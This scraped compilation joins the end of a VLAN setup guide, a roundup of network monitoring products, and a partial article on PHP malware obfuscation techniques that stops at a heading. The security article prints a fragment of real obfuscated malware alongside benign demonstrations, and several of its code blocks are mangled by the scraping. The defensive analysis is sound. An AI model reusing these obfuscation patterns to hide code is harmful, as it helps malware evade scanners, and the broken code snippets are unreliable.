> router(config)# ip route 0.0.0.0 0.0.0.0 192.168.1.1

c. Configure DHCP Server

To automatically assign IP addresses to devices inside the VLANs, you will need to configure a DHCP server. Follow these steps:

  1. The DHCP server should also be connected to the VLAN.
  2. Configure the DHCP server to provide IP addresses to devices in the VLAN.
  3. Configure the router to forward DHCP requests to the DHCP server by typing “ip helper-address <ip address>” (e.g., “ip helper-address 192.168.10.2”).

Final Words

By following the steps outlined in this post, you can easily set up a VLAN on your switch and effectively segment your network. Keep in mind to thoroughly test your VLAN configuration and consider additional configuration options to optimize your network for your specific needs.

With proper setup and configuration, VLANs can greatly enhance your network’s capabilities and 10x increase its performance and security.

Source :
https://www.pcwdld.com/how-to-set-up-a-vlan/

The Best Network Monitoring Tools & Software

Marc Wilson UPDATED: October 20, 2023

The realm of Network Monitoring Tools, Software, and Vendors is Huge, to say the least. New software, tools, and utilities are being launched almost every year to compete in an ever-changing marketplace of IT monitoringserver monitoring, and system monitoring software.

I’ve test-driven, played with and implemented dozens during my career and this guide rounds up the best ones in an easy-to-read format and highlighted their main strengths and why I think they are in the top class of tools to use in your IT infrastructure and business.

Some of the features I am looking for are device discovery, uptime/downtime indicators, along with robust and thorough alerting systems (via email/SMS),  NetFlow and SNMP Integration as  well as considerations that are important with any software purchase such as ease of use and value for money.

The features from above were all major points of interest when evaluating software suites for this article and I’ll try to keep this article as updated as possible with new feature sets and improvements as they are released.

Here is our list of the top network monitoring tools:

  1. Auvik – EDITOR’S CHOICE This cloud platform provides modules for LAN monitoring, Wi-Fi monitoring, and SaaS system monitoring. The network monitoring package discovers all devices, maps the network, and then implements automated performance tracking. Get a 14-day free trial.
  2. Paessler PRTG Network Monitor – FREE TRIAL A collection of monitoring tools and many of those are network monitors. Runs on Windows Server. Start a 30-day free trial.
  3. SolarWinds Network Performance Monitor – FREE TRIAL The leading network monitoring system that uses SNMP to check on network device statuses. This monitoring tool includes autodiscovery that compiles an asset inventory and automatically draws up a network topology map. Runs on Windows Server. Start 30-day free trial.
  4. Checkmk – FREE TRIAL This hybrid IT infrastructure monitoring package includes a comprehensive network monitor that provides device status tracking and traffic analysis functions via the integration with ntop. Available as a Linux install package, Docker package, appliance and cloud application available in cloud marketplaces. Get a 30-day free trial.
  5. Datadog Network Monitoring – FREE TRIAL Provides good visibility over each of the components of your network and the connections between them – be it cloud, on-premises or hybrid environment. Troubleshoot infrastructure, apps and DNS issues effortlessly.
  6. ManageEngine OpManager – FREE TRIAL An SNMP-based network monitor that has great network topology layout options, all based on an autodiscovery process. Installs on Windows Server and Linux.
  7. NinjaOne RMM – FREE TRIAL This cloud-based system provides remote monitoring and management for managed service providers covering the systems of their clients.
  8. Site24x7 Network Monitoring – FREE TRIAL A cloud-based monitoring system for networks, servers, and applications. This tool monitors both physical and virtual resources.
  9. Atera – FREE TRIAL A cloud-based package of remote monitoring and management tools that include automated network monitoring and a network mapping utility.
  10. ManageEngine RMM Central – FREE TRIAL A powerful asset and network management that includes patching, remote access, and automated remediation.

Related Post: Best Bandwidth Monitoring Software and Tools for Network Traffic Usage

The Top Network Monitoring Tools and Software

Below you’ll find an updated list of the Latest Tools & Software to ensure your network is continuously tracked and monitored at all times of the day to ensure the highest up-times possible. Most of them have free Downloads or Trials to get you started for 15 to 30 days to ensure it meets your requirements.

What should you look for in network monitoring tools?

We reviewed the market for network monitoring software and analyzed the tools based on the following criteria:

  • An automated service that can perform network monitoring unattended
  • A device discovery routine that automatically creates an asset inventory
  • A network mapping service that shows live statuses of all devices
  • Alerts for when problems arise
  • The ability to communicate with network devices through SNMP
  • A free trial or a demo for a no-cost assessment
  • Value for money in a package that provides monitoring for all network devices at a reasonable price

With these selection criteria in mind, we have defined a shortlist of suitable network monitoring tools for all operating systems.

1. Auvik – FREE TRIAL

Auvik Network Monitoring

Auvik is a SaaS platform that offers a network discovery and mapping system that automates enrolment and then continues to operate in order to spot changes in network infrastructure. This system is able to centralize and unify the monitoring of multiple sites.

Key Features:

  • A SaaS package that includes processing power and storage space for system logs as well as the monitoring software
  • Centralizes the monitoring of networks on multiple sites
  • Watches over network device statuses
  • Offers two plans: Essential and Performance
  • Network traffic analysis included in the higher plan
  • Monitors virtual LANs as well as physical networks
  • Autodiscovery service
  • Network mapping
  • Alerts for automated monitoring
  • Integrations with third-party complimentary systems

Why do we recommend it?

Auvik is a cloud-based network monitoring system. It reaches into your network, identifies all connected devices, and then creates a map. While SolarWinds Network Performance Monitor also performs those tasks, Auvik is a much lighter tool that you don’t have to host yourself and you don’t need deep technical knowledge to watch over a network with this automated system.

Auvik’s network monitoring system is automated, thanks to its system of thresholds. The service includes out-of-the-box thresholds that are placed on most of the metrics that the network monitor tracks. It is also possible to create custom thresholds.

Once the monitoring service is operating, if any of the thresholds are crossed, the system raises an alert. This mechanism allows technicians to get on with other tasks, knowing that the thresholds give them time to avert system performance problems that would be noticeable to users.

Network management tools that are included in the Auvik package include configuration management to standardize the settings of network devices and prevent unauthorized changes.

The processing power for Auvik is provided by the service’s cloud servers. However, the system requires collectors to be installed on each monitored site. This software runs on Windows Server and Ubuntu Linux. It is also possible to run the collector on a VM. Wherever the collector is located, the system manager still accesses the service’s console, which is based on the Auvik server, through any standard Web browser.

Who is it recommended for?

Smaller businesses that don’t have a team to support IT would benefit from Auvik. It needs no software maintenance and the system provides automated alerts when issues arise, so your few IT staff can get on with supporting other resources while Auvik looks after the network.

PROS:

  • A specialized network monitoring tool
  • Additional network management utilities
  • Configuration management included
  • A cloud-based service that is accessible from anywhere through any standard Web browser
  • Data collectors for Windows Server and Ubuntu Linux

CONS:

  • The system isn’t expandable with any other Auvik modules

Auvik doesn’t publish its prices by you can access a 14-day free trial.

EDITOR’S CHOICE

Auvik is our top pick for a network monitoring tool because it is a hosted SaaS package that provides all of your network monitoring needs without you needing to maintain the software. The Auvik platform installs an agent on your site and then sets itself up by scanning the network and identifying all devices. The inventory that this system generates gives you details of all of your equipment and provides a basis for network topology maps. Repeated checks on the network gather performance statistics and if any metric crosses a threshold, the tool will generate an alert.  You can centralize the monitoring of multiple sites with this service.

Download: Get a 14-day FREE Trial

Official Site: https://www.auvik.com/#trial

OS: Cloud-based

2. PRTG Network Monitor from Paessler – FREE TRIAL

PRTG Network Monitor

PRTG Network Monitor software is commonly known for its advanced infrastructure management capabilities. All devices, systems, traffic, and applications in your network can be easily displayed in a hierarchical view that summarizes performance and alerts. PRTG monitors the entire IT infrastructure using technology such as SNMP, WMI, SSH, Flows/Packet Sniffing, HTTP requests, REST APIs, Pings, SQL, and a lot more.

Key Features:

  • Autodiscovery that creates and maintains a device inventory
  • Live network topology maps are available in a range of formats
  • Monitoring for wireless networks as well as LANs
  • Multi-site monitoring capabilities
  • SNMP sensors to gather device health information
  • Ping to check on device availability
  • Optional extra sensors to monitor servers and applications
  • System-wide status overviews and drill-down paths for individual device details
  • A protocol analyzer to identify high-traffic applications
  • A packet sniffer to collect packet headers for analysis
  • Color-coded graphs of live data in the system dashboard
  • Capacity planning support
  • Alerts on device problems, resource shortages, and performance issues
  • Notifications generated from alerts that can be sent out by email or SMS
  • Available for installation on Windows Server or as a hosted cloud service

Why do we recommend it?

Paessler PRTG Network Monitor is a very flexible package. Not only does it monitor networks, but it can also monitor endpoints and applications. The PRTG system will discover and map your network, creating a network inventory, which is the basis for automated monitoring. You put together your ideal monitoring system by choosing which sensors to turn on. You pay for an allowance of sensors.

It is one of the best choices for organizations with low experience in network monitoring software. The user interface is really powerful and very easy to use.

A very particular feature of PRTG is its ability to monitor devices in the data center with a mobile app. A QR code that corresponds to the sensor is printed out and attached to the physical hardware. The mobile app is used to scan the code and a summary of the device is displayed on the mobile screen.

In summary, Paessler PRTG is a flexible package of sensors that you can tailor to your own needs by deciding which monitors to activate. The SNMP-based network performance monitoring routines include an autodiscovery system that generates a network asset inventory and topology maps. You can also activate traffic monitoring features that can communicate with switches through NetFlow, sFlow, J-Flow, and IPFIX. QoS and NBAR features enable you to keep your time-sensitive applications working properly.

Who is it recommended for?

PRTG is available in a Free edition, which is limited to 100 sensors. This is probably enough to support a small network. Mid-sized and large organizations should be interested in paying for larger allowances of sensors. The tool can even monitor multiple sites from one location.

PROS:

  • Uses a combination of packet sniffing, WMI, and SNMP to report network performance data
  • Fully customizable dashboard is great for both lone administrators as well as NOC teams
  • Drag and drop editor makes it easy to build custom views and reports
  • Supports a wide range of alert mediums such as SMS, email, and third-party integrations into platforms like Slack
  • Each sensor is specifically designed to monitor each application, for example, there are prebuilt sensors whose specific purpose is to capture and monitor VoIP activity
  • Supports a freeware version

CONS:

  • Is a very comprehensive platform with many features and moving parts that require time to learn

PRTG has a very flexible pricing plan, to get an idea visit their official pricing webpage below. It is free to use for up to 50 sensors. Beyond that you get a 30-day free trial to figure out your network requirements.

Paessler PRTGDownload a 30-day FREE Trial

3. SolarWinds Network Performance Monitor – FREE TRIAL

SolarWinds Network Performance Monitor with Free Trial

SolarWinds Network Performance Monitor is easy to setup and can be ready in no time. The tool automatically discovers network devices and deploys within an hour. Its simple approach to oversee an entire network makes it one of the easiest to use and most intuitive user interfaces.

Key Features:

  • Automatically Network Discovery and Scanning for Wired and Wifi Computers and Devices
  • Support for Wide Array of OEM Vendors
  • Forecast and Capacity Planning
  • Quickly Pinpoint Issues with Network Performance with NetPath™ Critical Path visualization feature
  • Easy to Use Performance Dashboard to Analyze Critical Data points and paths across your network
  • Robust Alerting System with options for Simple/Complex Triggers
  • Monitor CISCO ASA networks with their New Network Insight™ for CISCO ASA
  • Monitor ACL‘s, VPN, Interface and Monitor on your Cisco ASA
  • Monitor Firewall rules through Firewall Rules Browser
  • Hop by Hop Analysis of Critical Network Paths and Components
  • Automatically Discover Networks and Map them along with Topology Views
  • Manage, Monitor and Analyze Wifi Networks within the Dashboard
  • Create HeatMaps of Wifi Networks to pin-point Wifi Dead Spots
  • Monitor Hardware Health of all Servers, Firewalls, Routers, Switches, Desktops, laptops and more
  • Real-Time Network and Netflow Monitoring for Critical Network Components and Devices

Why do we recommend it?

SolarWinds Network Performance Monitor is the leading network monitoring tool in the world and this is the system that the other monitor providers are chasing. Like many other network monitors, this system uses the Simple Network Management Protocol (SNMP) to gather reports on network devices. The strength of SolarWinds lies in the deep technical knowledge of its support advisors, which many other providers lack.

The product is highly customizable and the interface is easy to manage and change very quickly. You can customize the web-based performance dashboards, charts, and views. You can design a tailored topology for your entire network infrastructure. You can also create customized dependency-aware intelligent alerts and much more.

SolarWinds NPM Application Summary

The software is sold by separate modules based on what you use. SolarWinds Network Performance Monitor Price starts from $1,995 and is a one-time license including 1st-year maintenance.

SolarWinds NPM has an Extensive Feature list that make it One of the Best Choices for Network Monitoring Solutions

SolarWinds NPM is able to track the performance of networks autonomously through the use of SNMP procedures, producing alerts when problems arise. Alerts are generated if performance dips and also in response to emergency notifications sent out by device agents. This system means that technicians don’t have to watch the monitoring screen all the time because they know that they will be drawn back to fix problems by an email or SMS notification.

SolarWinds NPM - NetPath Screenshot
NetPath Screenshot

Who is it recommended for?

SolarWinds Network Performance Monitor is an extensive network monitoring system and it is probably over-engineered for use by a small business. Mid-sized and large companies would benefit from using this tool.

PROS:

  • Supports auto-discovery that builds network topology maps and inventory lists in real-time based on devices that enter the network
  • Has some of the best alerting features that balance effectiveness with ease of use
  • Supports both SNMP monitoring as well as packet analysis, giving you more control over monitoring than similar tools
  • Uses drag and drop widgets to customize the look and feel of the dashboard
  • Tons of pre-configured templates, reports, and dashboard views

CONS:

  • This is a feature-rich enterprise tool designed for sysadmin, non-technical users may some features overwhelming

You can start with a 30-day free trial.

SolarWinds NPMDownload a 30-day FREE Trial!

4. Checkmk – FREE TRIAL

Checkmk Uplink Bandwidth Graph

Checkmk is an IT asset monitoring package that has the ability to watch over networks, servers, services, and applications. The network monitoring facilities in this package provide both network device status tracking and network traffic monitoring.

Features of this package include:

  • Device discovery that cycles continuously, spotting new devices and removing retired equipment
  • Creation of a network inventory
  • Registration of switches, routers, firewalls, and other network devices
  • Creation of a network topology map
  • Continuous device status monitoring with SNMP
  • SNMP feature report focus for small businesses
  • Performance thresholds with alerts
  • Wireless network monitoring
  • Protocol analysis
  • Traffic throughput statistics per link
  • Switch port monitoring
  • Gateway transmission speed tracking
  • Network traffic data extracted with ntop
  • Can monitor a multi-vendor environment

Why do we recommend it?

The Checkmk combination of network device monitoring and traffic monitoring in one tool is rare. Most network monitoring service creators split those two functions so that you have to buy two separate packages. The Checkmk system also gives you application and server monitoring along with the network monitoring service.

The Checkmk system is easy to set up, thanks to its autodiscovery mechanism. This is based on SNMP. The program will act as an SNMP Manager, send out a broadcast requesting reports from device agents, and then compile the results into an inventory. The agent is the Checkmk package itself if you choose to install the Linux version or it is embedded on a device if you go for the hardware option. If you choose the Checkmk Cloud SaaS option, that platform will install an agent on one of your computers.

The SNMP Manager constantly re-polls for device reports and the values in these appear in the Checkmk device monitoring screen. The platform also updates its network inventory according to the data sent back by device agents in each request/response round. The dashboard also generates a network topology map from information in the inventory. So, that map updates whenever the inventory changes.

Checkmk Network Topology

While gathering information through SNMP, the tool also scans the headings of passing packets on the network to compile traffic statistics. Basically, the tool provides a packet count which enables it to quickly calculate a traffic throughput rate. Data can also be segmented per protocol, according to the TCP port number in each header.

Who is it recommended for?

Checkmk has a very wide appeal because of its three editions. Checkmk Raw is free and will appeal to small businesses. This is an adaptation of Nagios Core. The paid version of the system is called Checkmk Enterprise and that is designed for mid-sized and large businesses. Checkmk Cloud is a SaaS option.

PROS:

  • Provides both network device monitoring and traffic tracking
  • Automatically discovers devices and creates a network inventory
  • Free version available
  • Options for on-premises or SaaS delivery
  • Monitors wireless networks as well as LANs
  • Available for installation on Linux or as an appliance

CONS:

  • Provides a lot of screens to look through

Start a 30-day free trial.

CheckmkStart 30-day FREE Trial

5. Datadog Network Monitoring – FREE TRIAL

Datadog App Performance

Datadog Network Monitoring supervises the performance of network devices. The service is a cloud-based system that is able to explore a network and detect all connected devices. With the information from this research, the network monitor will create an asset inventory and draw up a network topology map. This procedure means that the system performs its own setup routines.

Features of this package include:

  • Monitors networks anywhere, including remote sites
  • Joins together on-premises and cloud-based resource monitoring
  • Integrates with other Datadog modules, such as log management
  • Offers an overview of all network performance and drill-down details of each device
  • Facilitates troubleshooting by identifying performance dependencies
  • Includes DNS server monitoring
  • Gathers SNMP device reports
  • Blends performance data from many information sources
  • Includes data flow monitoring
  • Offers tag-based packet analysis utilities in the dashboard
  • Integrates protocol analyzers
  • Performance threshold baselining based on machine learning
  • Alerts for warnings over evolving performance issues
  • Packages offer network performance monitoring tools (traffic analysis) or network device monitoring
  • Subscription charges with no startup costs

Why do we recommend it?

Datadog Network Monitoring services are split into two modules that are part of a cloud platform of many system monitoring and management tools. These two packages are called Network Performance Monitoring and Network Device Monitoring, which are both subscription services. While the device monitoring package works through SNMP, the performance monitor measures network traffic levels.

The autodiscovery process is ongoing, so it spots any changes you make to your network and instantly updates the inventory and the topology map. The service can also identify virtual systems and extend monitoring of links out to cloud resources.

Datadog Network Monitoring

Datadog Network Monitoring provides end-to-end visibility of all connections, which are also correlated with performance issues highlighted in log messages. The dashboard for the system is resident in the cloud and accessed through any standard browser. This centralizes network performance data from many sources and covers the entire network, link by link and end to end.

You can create custom graphs, metrics, and alerts in an instant, and the software can adjust them dynamically based on different conditions. Datadog prices start from free (up to five hosts), Pro $15/per host, per month and Enterprise $23 /per host, per month.

Who is it recommended for?

The two Datadog network monitoring packages are very easy to sign up for. They work well together to get a complete view of network activities. The pair will discover all of the devices on your network and map them, then startup automated monitoring. These are very easy-to-use systems that are suitable for use by any size of business.

PROS:

  • Has one of the most intuitive interfaces among other network monitoring tools
  • Cloud-based SaaS product allows monitoring with no server deployments or onboarding costs
  • Can monitor both internally and externally giving network admins a holistic view of network performance and accessibility
  • Supports auto-discovery that builds network topology maps on the fly
  • Changes made to the network are reflected in near real-time
  • Allows businesses to scale their monitoring efforts reliably through flexible pricing options

CONS:

  • Would like to see a longer trial period for testing

Start a 14-day free trial.

DatadogStart a 14-day FREE Trial

6. ManageEngine OpManager – FREE TRIAL

ManageEngine OpManager Linux Network Monitoring

At its core, ManageEngine OpManager is infrastructure management, network monitoring, and application performance management “APM” (with APM plug-in) software.

Key Features:

  • Includes server monitoring as well as network monitoring
  • Autodiscovery function for automatic network inventory assembly
  • Constant checks on device availability
  • A range of network topology map options
  • Automated network mapping
  • Performs an SNMP manager role, constantly polling for device health statuses
  • Receives SNMP Traps and generates alerts when device problems arise
  • Implements performance thresholds and identifies system problems
  • Watches over resource availability
  • Customizable dashboard with color-coded dials and graphs of live data
  • Forwards alerts to individuals by email or SMS
  • Available for Windows Server and Linux
  • Can be enhanced by an application performance monitor to create a full stack supervisory system
  • Free version available
  • Distributed version to supervise multiple sites from one central location

Why do we recommend it?

ManageEngine OpManager is probably the biggest threat to SolarWind’s leading position. This package monitors servers as well as networks. This makes it a great system for monitoring virtualizations.

When it comes to network management tools, this product is well balanced when it comes to monitoring and analysis features.

The solution can manage your network, servers, network configuration, and fault & performance; It can also analyze your network traffic. To run Manage Engine OpManager, it must be installed on-premises.

A highlight of this product is that it comes with pre-configured network monitor device templates. These contain pre-defined monitoring parameters and intervals for specific device types.
The essential edition product can be purchased for $595 which allows up to 25 devices.

Who is it recommended for?

A nice feature of OpManager is that it is available for Linux as well as Windows Server for on-premises installation and it can also be used as a service on AWS or Azure for businesses that don’t want to run their own servers. The pricing for this package is very accessible for mid-sized and large businesses. Small enterprises with simple networks should use the Free edition, which is limited to covering a network with three connected devices.

PROS:

  • Designed to work right away, features over 200 customizable widgets to build unique dashboards and reports
  • Leverages autodiscovery to find, inventory, and map new devices
  • Uses intelligent alerting to reduce false positives and eliminate alert fatigue across larger networks
  • Supports email, SMS, and webhook for numerous alerting channels
  • Integrates well in the ManageEngine ecosystem with their other products

CONS:

  • Is a feature-rich tool that will require a time investment to properly learn

Start 30-day free trial.

ManageEngine OpManagerDownload a 30-day FREE Trial

7. NinjaOne RMM – FREE TRIAL

NinjaOne Endpoint Management

NinjaOne is a remote monitoring and management (RMM) package for managed service providers (MSPs). The system reaches out to each remote network through the installation of an agent on one of its endpoints. The agent acts as an SNMP Manager.

Key Features:

  • Based on the Simple Network Management Protocol
  • SNMP v1, 2, and 3
  • Device discovery and inventory creation
  • Continuous status polling for network devices and endpoints
  • Live traffic data with NetFlow, IPFIX, J-Flow, and sFlow
  • Traffic throughput graphs
  • Customizable detail display
  • Performance graphs
  • Switch port mapper
  • Device availability checks
  • Syslog processing for device status reports
  • Customizable alerts
  • Notifications by SMS or email
  • Related endpoint monitoring and management

Why do we recommend it?

NinjaOne RMM enables each technician to support multiple networks simultaneously. The alerting mechanism in the network monitoring service means that you can assume that everything is working fine on a client’s system unless you receive a notification otherwise. The network tracking service sets itself up automatically with a discovery routine.

The full NinjaOne RMM package provides a full suite of tools for administering a client’s system. The network monitoring service is part of that bundle along with endpoint monitoring and patch management.

The Ninja One system onboards a new client site automatically through a discovery service that creates both hardware and software inventories. The data for each client is kept separate in a subaccount. Technicians that need access to that client’s system for investigation need to be set up with credentials.

The network monitoring system provides both device status tracking and network traffic analysis. The service provides notifications if a dive goes offline or throughput drops.

Who is it recommended for?

This service is built with a multi-tenant architecture for use by managed service providers. However, IT departments can also use the system to manage their own networks and endpoints. The service is particularly suitable for simultaneously monitoring multiple sites. The console for the RMM is based in the cloud and accessed through any standard Web browser.

PROS:

  • A cloud-based package that onboards sites through the installation of an agent
  • Auto discovery for network devices and endpoints
  • Network device status monitoring
  • Network traffic analysis
  • Syslog message scanning

CONS:

  • No price list

NinjaOne doesn’t publish a price list so you start your buyer’s journey by accessing a 14-day free trial.

NinjaOneStart a 14-day FREE Trial

8. Site24x7 Network Monitoring – FREE TRIAL

Site24x7 Network Performance Monitor

Site24x7 is a monitoring service that covers networks, servers, and applications. The network monitoring service in this package starts off by exploring the network for connected devices. IT logs its findings in a network inventory and draws up a network topology map.

Key Features:

  • A hosted cloud-based service that includes CPU time and performance data storage space
  • Can unify the monitoring of networks on site all over the world
  • Uses SNMP to check on device health statuses
  • Gives alerts on resource shortages, performance issues, and device problems
  • Generates notifications to forward alerts by email or SMS
  • Root cause analysis features
  • Autodiscovery for a constantly updated network device inventory
  • Automatic network topology mapping
  • Includes internet performance monitoring for utilities such as VPNs
  • Specialized monitoring routines for storage clusters
  • Monitors boundary and edge services, such as load balancers
  • Offers overview and detail screens showing the performance of the entire network and also individual devices
  • Includes network traffic flow monitoring
  • Facilities for capacity planning and bottleneck identification
  • Integrates with application monitoring services to create a full stack service

Why do we recommend it?

Site24x7 Network Monitoring is part of a platform that is very similar to Datadog. A difference lies in the number of modules that Site24x7 offers – it has far fewer than Datadog. Site24x7 bundles its modules into packages with almost all plans providing monitoring for networks, servers, services, applications, and websites. Site24x7 was originally developed to be a SaaS plan for ManageEngine but then was split out into a separate brand, so there is very solid expertise behind this platform.

The Network Monitor uses procedures from the Simple Network Management Protocol (SNMP) to poll devices every minute for status reports. Any changes in the network infrastructure that are revealed by these responses update the inventory and topology map.

The results of the device responses are interpreted into live data in the dashboard of the monitor. The dashboard is accessed through any standard browser and its screens can be customized by the user.

The SNMP system empowers device agents to send out a warning without waiting for a request if it detects a problem with the device that it is monitoring. Site24x7 Infrastructure catches these messages, which are called Traps, and generates an alert. This alert can be forwarded to technicians by SMS, email, voice call, or instant messaging post.

The Network Monitor also has a traffic analysis function. This extracts throughput figures from switches and routers and displays data flow information in the system dashboard. This data can also be used for capacity planning.

Who is it recommended for?

The plans for Site24x7 are very reasonably priced, which makes them accessible to businesses of all sizes. Setup for the system is automated and much of the ongoing monitoring processes are carried out without any manual intervention.

PROS:

  • One of the most holistic monitoring tools available, supporting networks, infrastructure, and real user monitoring in a single platform
  • Uses real-time data to discover devices and build charts, network maps, and inventory reports
  • Is one of the most user-friendly network monitoring tools available
  • User monitoring can help bridge the gap between technical issues, user behavior, and business metrics
  • Supports a freeware version for testing

CONS:

  • Is a very detailed platform that will require time to fully learn all of its features and options

Site24x7 costs $9 per month when paid annually. It is available for a free trial.

Site24x7Get the FREE Trial

9. Atera – FREE TRIAL

Atera Screenshot

Atera is a package software that was built for managed service providers. It is a SaaS platform and it includes professional service automation (PSA) and remote monitoring and management (RMM) systems.

Why do we recommend it?

Atera is a package of tools for managed service providers (MSPs). Alongside remote network monitoring capabilities, this package provides automated monitoring services for all IT operations. The package also includes some system management tools, such as a patch manager. Finally, the Atera platform offers Professional Services Automation (PSA) tools to help the managers of MSPs to run their businesses.

The network monitoring system operates remotely through an agent that installs on Windows Server. The agent enables the service to scour the network and identify all of the network devices that run it. This is performed using SNMP, with the agent acting as the SNMP Manager.

The SNMP system enables the agent to spot Traps, which warn of device problems. These are sent to the Atera network monitoring dashboard, where they appear as alerts. Atera offers an automated topology mapping service, but this is an add-on to the main subscription packages.

Who is it recommended for?

Atera charges for its platform per technician, so it is very affordable for MSPs of all sizes. This extends to sole technicians operating on a contract basis and possibly fielding many small business clients.

PROS:

  • Remote automated network discovery
  • Network performance monitoring with SNMP
  • Alerts for notified device problems
  • Also includes remote system management tools
  • Scalable pricing with three plan levels
  • 30-day free trial

CONS:

  • Network mapping costs extra

You can start a 30-day free trial.

AteraStart 30-day Free Trial

10. ManageEngine RMM Central – FREE TRIAL

ManageEngine RMM Central

ManageEngine RMM Central provides sysadmins with everything they need to support their network. Automated asset discovery makes deployment simple, allowing you to collect all devices on your network by the end of the day.

Key Features

  • Automated network monitoring and asset discovery
  • Built-in remote access with various troubleshooting tools
  • Flexible alert integrations

With network and asset metrics collected, administrators can quickly see critical insights automatically generated by the platform. With over 100 automated reports it’s easy to see exactly where your bottlenecks are and what endpoints are having trouble.

Administrators can configure their own SLAs with various automated alert options and even pair those alerts with other automation that integrate into their helpdesk workflow.

PROS:

  • Uses a combination of packet sniffing, WMI, and SNMP to report network performance data
  • Fully customizable dashboard is great for both lone administrators as well as NOC teams
  • Drag and drop editor makes it easy to build custom views and reports
  • Supports a wide range of alert mediums such as SMS, email, and third-party integrations into platforms like Slack

CONS:

  • Is a very comprehensive platform with many features and moving parts that require time to learn

Start a 30-day free trial.

source :
https://www.pcwdld.com/network-monitoring-tools-software/

Know Your Malware Part Two – Hacky Obfuscation Techniques

Ram Gall
November 1, 2023

In the first post in this series, we covered common PHP encoding techniques and how they’re used by malware to hide from security analysts and scanners. In today’s post, we’re going to dive a little bit deeper into other obfuscation techniques that make use of other features available in PHP.

Obfuscation Redux

In the first post in this series, we defined Obfuscation as the process of concealing the purpose or functionality of code or data so that it evades detection and is more difficult for a human or security software to analyze, but still fulfills its intended purpose. One of the main contributing factors to the popularity of PHP is its ease of use, but the same functionality that makes it easy to use also makes it easy to abuse, often in ways that were never intended.

The techniques covered in this post are often simpler and “hackier” than the ones listed in the previous article, and most of them are less reliable as indicators of malicious activity individually, as several of them typically need to be combined in order to achieve sufficient obfuscation. These techniques are also often easier for a human analyst to spot, but they are also more difficult to detect using scanning tools due to the wide variety of permutations available. Such simpler obfuscation methods can also be creatively combined with encoding techniques, granting malware authors a formidable array of tactics to avoid detection.

While it is not practical to cover every possible technique in active use, this article will detail the more commonly found methods, and help illustrate the wide range of possibilities when decoding obfuscated malware. Several of the methods we will cover today, such as comment abuse, can be combined into almost infinite variations with minute changes, thus rendering them completely undetectable to traditional hash-based malware scanning and even partially slowing down regular expression-based scanning of the type used by Wordfence.

Fortunately, while these methods do make analysis more difficult, and can slow down scanning, their presence in certain combinations is a strong signal of malicious activity, and the malware detection signatures used by the Wordfence plugin and Wordfence CLI are tuned to detect these combinations with astoundingly few false positives. Wordfence CLI in particular is useful in these cases, as it is highly performant and can run multithreaded jobs, compensating for any speed penalties imposed by these techniques.

Comment Abuse

PHP has several methods of adding code comments that you may already be familiar with. Well-commented code is considered a best practice, as it makes it much easier to maintain software and pay off technical debt, but comments can also be used for illicit purposes.

PHP uses three styles of comments:

//, denoting a single line comment that ends on the next line.

#, likewise a single line comment that ends on the next line, though this is less common than ‘//’.

/*, the beginning of a multiline comment, which can only closed with */.

Multiline comments are particularly useful to malware authors because they are ignored by PHP, and do not have to extend over multiple lines. This means that an attacker can “break up” their code to evade scanners using comments. For instance, the following code block prints “Hello, World!”:

1234<?phpecho/*blah*/"Hello, World!"/*blah*/;

While this is a very basic example, more complicated examples can be found in real malware, such as the following snippet, which makes use of several additional obfuscation techniques, including octal escape sequences and invisible null bytes:

12,<?php        function/*ti*/ed_ixpn(){     echo/* o_lpl*/20508;  }$disdcrxh_/* ohgvr*/= 'disdcrxh_'/*  _jnsm  */^       '';$zggkgqda= "\146".     "\151"$disdcrxh_(361-253)   ./* qts   */"e"."_".$disdcrxh_(564-452)/* rxw*/.     $disdcrxh_(1006-889)     . "t".$disdcrxh_(952-857) ./*  w  */"c".$disdcrxh_(111) ./*fcup  */"n".$disdcrxh_(162-46)/*   djtrl   */./*  pwdn  */"e".$disdcrxh_(407-297)      .      $disdcrxh_(854-738) . $disdcrxh_(115);

While we’re not going to fully analyze this malware today, it already presents problems for many scanners. For instance, a scanner searching for the very first line of code, function ed_ixpn() would fail to find it because of the comments. While detection using regular expressions, such as the ones used by the Wordfence Plugin scanner and Wordfence CLI are capable of detecting malware of this type, it still imposes a performance penalty on detection due to the enormous number of possible variations.

Concatenation Catastrophe

PHP makes string concatenation very simple via the dot . operator. This allows programmers to join two separate strings with minimal hassle. For instance, the following code outputs “Hello, World!”:

1<?php echo“He”.”llo,”.”wor”.”ld”;

There are a large number of legitimate use cases for string concatenation, so it’s generally only an indicator of malicious activity when combined with several other obfuscation techniques. The malware sample we shared earlier provides a good example of this, with octal encoding concatenated with the return values of various functions, which we’ll get to in a later section.

Index Fun

PHP, like most languages, stores text strings as arrays of characters, each with a defined position or index. This makes it possible to assemble arbitrary commands and data from a string containing the required characters, using the array index of each character and the concatenation operator. For instance, the following code prints “Hello, World!”:

1234<?php$string="Wow, what a cool Helpful research device!";echo$string[17].$string[18].$string[19].$string[19].$string[1].$string[3].$string[4].$string[0].$string[1].$string[25].$string[15].$string[34].$string[40];

PHP arrays start with an index of 0, meaning that $string[0] in the example above would be “W”, the first letter of “Wow, what a cool Helpful research device!”. By concatenating letters from different parts of that text string, it’s possible to assemble an entirely different text string.

This method can be very helpful for hiding the underlying text being assembled from human researchers and security scan tools alike, and though it does have the occasional legitimate use in selecting chunks of text, when used extensively it is a strong indicator of malicious activity, though it typically needs to be combined with additional techniques such as evaluating the resulting string or passing it to a function.

Math, Not Even Once

PHP allows mathematical operations within other functionality. One of the interesting features in the malware snippet – $disdcrxh_(564-452) – demonstrates this, with it turning out as $disdcrxh_112 due to the subtraction of 564 and 452 in the parenthesis. This functionality can likewise be combined with the string index technique mentioned above. For example, the following code prints out “Hello, World!”:

123<?php$string="Wow, what a cool Helpful research device!";echo$string[(15+2)].$string[(20-2)].$string[(10+9)].$string[(29-10)].$string[(5-4)].$string[(1+2)].$string[(2+2)].$string[(5-5)].$string[(12-11)].$string[(5*5)].$string[(5*3)].$string[34].$string[(160/4)];

This adds an additional obfuscation layer that can make it even more difficult to determine the code’s functionality without executing it. However, it is incredibly rare for this type of code to be used legitimately, so the presence of this technique is typically an indicator of malicious activity.

String Reversals

One of the most basic functions in PHP’s text string manipulation libraries is strrev, which is used to reverse strings of text. For instance, the following code snippet prints out “Hello, World!”:

1<?php echostrrev("!dlroW ,olleH");

While not particularly effective at obfuscation on its own, it can be combined with the techniques in this article as well as nearly all of the techniques in our previous article on encoding to make it even more difficult to decode malicious functionality. While it has a number of legitimate use cases, the presence of strrev alongside two or more additional encoding or obfuscation techniques is often a reliable indicator of compromise.

Variable, Dynamic, and Anonymous Functions

